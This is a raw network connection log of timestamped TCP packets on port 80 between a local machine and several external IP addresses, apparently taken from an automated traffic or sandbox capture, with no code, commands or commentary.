                                              Sep 25, 2024 12:46:51.144658089 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144680977 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144690037 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.144699097 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.145087004 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.747678995 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.747853041 CEST8049739217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:51.747915983 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:52.650767088 CEST4973980192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:53.670685053 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.349356890 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.349723101 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.357356071 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.362328053 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950181007 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950196981 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950206995 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:46:54.950373888 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.955832005 CEST4974080192.168.2.4217.70.184.50
                                              Sep 25, 2024 12:46:54.961429119 CEST8049740217.70.184.50192.168.2.4
                                              Sep 25, 2024 12:47:00.237888098 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.242842913 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.242919922 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.253182888 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:00.258025885 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696494102 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696511984 CEST8049742172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:00.696604013 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:01.761370897 CEST4974280192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.778814077 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.783682108 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:02.783791065 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.794791937 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:02.799645901 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.239924908 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.240220070 CEST8049743172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:03.240302086 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:04.307553053 CEST4974380192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.326919079 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.332516909 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.332601070 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.344904900 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:05.352102041 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352117062 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352128029 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352139950 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352152109 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352205992 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352219105 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352230072 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.352241993 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.797883034 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.798288107 CEST8049744172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:05.798337936 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:06.853897095 CEST4974480192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.873565912 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.878520966 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:07.878652096 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.887039900 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:07.891868114 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.337837934 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.337918043 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:08.338133097 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:08.342025995 CEST4974580192.168.2.4172.96.187.60
                                              Sep 25, 2024 12:47:08.350539923 CEST8049745172.96.187.60192.168.2.4
                                              Sep 25, 2024 12:47:13.375998020 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.384107113 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.384177923 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.400037050 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:13.404890060 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.838654041 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:13.838742018 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:14.916475058 CEST4974680192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:14.921328068 CEST80497463.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:15.936326981 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.941230059 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:15.941307068 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.956368923 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:15.961257935 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:17.316632986 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:17.316781998 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:17.463530064 CEST4974780192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:17.468610048 CEST80497473.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.481421947 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.489424944 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.489515066 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.498404026 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:18.506987095 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.506999969 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507006884 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507083893 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.507091999 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508768082 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508778095 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.508780956 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:18.509174109 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:20.010251999 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:20.015778065 CEST80497483.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:20.015984058 CEST4974880192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.053649902 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.058702946 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.058805943 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.065594912 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.070488930 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516455889 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516558886 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:21.516611099 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.519119978 CEST4974980192.168.2.43.33.130.190
                                              Sep 25, 2024 12:47:21.526412964 CEST80497493.33.130.190192.168.2.4
                                              Sep 25, 2024 12:47:26.724991083 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.729835033 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:26.730005026 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.743124962 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:26.747953892 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411669016 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411685944 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411695957 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411706924 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411719084 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411729097 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411741018 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411752939 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411763906 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411767960 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411767960 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411773920 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411787033 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.411820889 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.411820889 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.416769981 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.416846991 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.416920900 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.446911097 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.446991920 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447026968 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447036028 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447062969 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447082996 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447101116 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447254896 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447293043 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447325945 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447380066 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447386026 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.447429895 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447463989 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.447484016 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448113918 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448164940 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448167086 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448200941 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448234081 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448268890 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.448318005 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448318005 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:27.448901892 CEST804975067.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:27.449425936 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:28.244560957 CEST4975080192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.271991968 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.278112888 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.278209925 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.288917065 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.293889999 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.889935017 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.889986038 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890003920 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890019894 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890026093 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890037060 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890053034 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890053988 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890072107 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890085936 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890089035 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890101910 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890119076 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.890120983 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.890166998 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897145987 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897180080 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897213936 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897228003 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897366047 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.897409916 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.897495985 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.947614908 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983624935 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983655930 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983689070 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983711958 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983721018 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983755112 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983760118 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.983789921 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.983838081 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.985042095 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985074997 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985110044 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985116959 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.985194921 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.985240936 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986046076 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986078024 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986112118 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986120939 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986195087 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986231089 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:29.986852884 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986884117 CEST804975167.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:29.986936092 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:30.791532993 CEST4975180192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.811156034 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.816095114 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.816159964 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.831346035 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:31.836272955 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836299896 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836323023 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836334944 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836348057 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836476088 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836507082 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836519003 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:31.836545944 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412100077 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412146091 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412180901 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412214041 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412218094 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412250042 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412261963 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412281036 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412313938 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412321091 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412348032 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412381887 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412411928 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.412508011 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.412545919 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.417418957 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417453051 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417486906 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417501926 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.417521954 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.417565107 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.499484062 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499527931 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499552011 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499566078 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499581099 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499594927 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499593973 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.499609947 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499625921 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499644995 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.499684095 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.499684095 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.499685049 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.500464916 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500500917 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500504971 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.500519037 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500534058 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500550032 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500551939 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.500567913 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.500581980 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:32.501323938 CEST804975267.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:32.501369953 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:33.339756966 CEST4975280192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.356501102 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.361534119 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.361624002 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.367429972 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.372327089 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943494081 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943531990 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943548918 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943564892 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943578959 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943594933 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943609953 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943625927 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943639040 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943654060 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.943685055 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.943779945 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.948719978 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.948739052 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.948755980 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.948771000 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.948788881 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:34.949034929 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:34.994509935 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.031111956 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031131029 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031204939 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031219959 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031234980 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031248093 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.031250000 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.031311035 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.031311035 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.031325102 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032150030 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032166958 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032182932 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032197952 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032207012 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.032213926 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.032228947 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.032289982 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.033005953 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.033023119 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.033039093 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.033082008 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.033459902 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:35.033520937 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.037404060 CEST4975380192.168.2.467.223.117.189
                                              Sep 25, 2024 12:47:35.043258905 CEST804975367.223.117.189192.168.2.4
                                              Sep 25, 2024 12:47:40.271982908 CEST4975480192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:40.278135061 CEST8049754103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:40.278214931 CEST4975480192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:40.290477991 CEST4975480192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:40.297430992 CEST8049754103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:41.807157993 CEST4975480192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:41.856178045 CEST8049754103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:42.828066111 CEST4975580192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:42.834423065 CEST8049755103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:42.834856987 CEST4975580192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:42.846831083 CEST4975580192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:42.851687908 CEST8049755103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:44.354366064 CEST4975580192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:44.400181055 CEST8049755103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.372778893 CEST4975680192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:45.378864050 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.380863905 CEST4975680192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:45.392801046 CEST4975680192.168.2.4103.248.137.209
                                              Sep 25, 2024 12:47:45.397687912 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.397749901 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.397763968 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.397799015 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.397810936 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.398000002 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.398013115 CEST8049756103.248.137.209192.168.2.4
                                              Sep 25, 2024 12:47:45.398024082 CEST8049756103.248.137.209192.168.2.4
